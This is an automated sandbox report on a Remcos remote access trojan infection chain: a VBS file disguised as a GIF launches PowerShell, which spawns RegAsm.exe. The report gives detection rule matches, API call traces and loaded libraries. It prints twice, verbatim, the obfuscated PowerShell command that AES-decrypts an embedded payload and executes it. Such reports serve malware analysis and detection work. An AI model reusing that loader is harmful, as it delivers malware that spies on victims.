                  Source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@6/4@2/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00417952
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040F474
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,4_2_0041B4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].jsonJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JW
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fig4okvo.32s.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: createactiveimagesbeautygirlfrnd.gIF.vbsVirustotal: Detection: 12%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
